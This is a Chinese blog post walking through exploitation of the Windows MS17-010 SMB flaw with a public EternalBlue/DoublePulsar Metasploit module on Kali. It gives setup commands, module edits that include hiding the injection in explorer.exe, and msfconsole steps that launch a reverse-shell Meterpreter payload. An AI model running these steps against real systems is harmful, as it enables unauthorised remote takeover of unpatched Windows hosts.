MS17-010的利用

前言

MS17-010是什么想必大家都不陌生了,前段時間Shadow Broker披露的 Windows漏洞,影響Windows 7和Windows Server 2008大部分版本系統(tǒng)。最近一直沒啥時間試試,今天晚上終于找到了合適的時間。

參考了兩篇文章

1.http://www.freebuf.com/articles/system/132274.html

2.http://www.freebuf.com/articles/system/132813.html

這兩篇文章的方法都需要Python2.6? 和 pywin32環(huán)境,感覺有些麻煩...這里使用kali來進(jìn)行MS17-010的利用

1.下載EXP

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2.配置環(huán)境

64位:

dpkg --add-architecture i386

apt-get update

apt-get install lib32z1 lib32ncurses5

apt-get install wine32

wine cmd.exe

32位:

wine cmd.exe

(吐槽一下,感覺64位配置環(huán)境的時間都夠下個32位安上了)

3.修改下載的eternalblue_doublepulsar.rb

1.改路徑

將/root/Eternalblue-Doublepulsar-Metasploit/deps/改為/usr/share/metasploit-framework/modules/exploits/windows/smb/deps

2.改進(jìn)程名稱

默認(rèn)進(jìn)程名稱為wlms.exe,建議修改為explorer.exe


3.將文件名稱改為方便的名稱(我改為了ms17-010.rb)

4.將文件復(fù)制到kali的/usr/share/metasploit-framework/modules/exploits/windows/smb/

4.開始利用exp

1.打開msf

2.加載exp

use exploit/windows/smb/ms17-010

3.建立payload

set payload windows/x64/meterpreter/reverse_tcp

4.配置參數(shù)

這里就不詳細(xì)說了,不會的百度

5.執(zhí)行


成功


最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容

  • 轉(zhuǎn)自:http://www.freebuf.com/sectool/105524.html 本文為作者總結(jié)自己在滲...
    許安念安閱讀 5,702評論 0 10
  • show exploits列出metasploit框架中的所有滲透攻擊模塊。show payloads列出meta...
    流弊的小白閱讀 1,891評論 0 13
  • 使用wine可以在linux下運行windows程序。 root@ubuntu:~# apt-get instal...
    Instu閱讀 818評論 0 0
  • 舉手投足之間,容納了一個世界…… 礦上的男人,一般都是皮膚黝黑的,風(fēng)吹日曬長年累月,慢慢積淀成的。礦上的男人很豪爽...
    月若有情月獨吟閱讀 475評論 3 1
  • 我早上去辭職,把身份證拿回來。 鄭兒還是吃什么吐什么,喝水都吐。 上午洗了三桶衣服床單被褥,這些都是鄭兒嘔吐所弄臟...
    簡寧思靜閱讀 254評論 0 0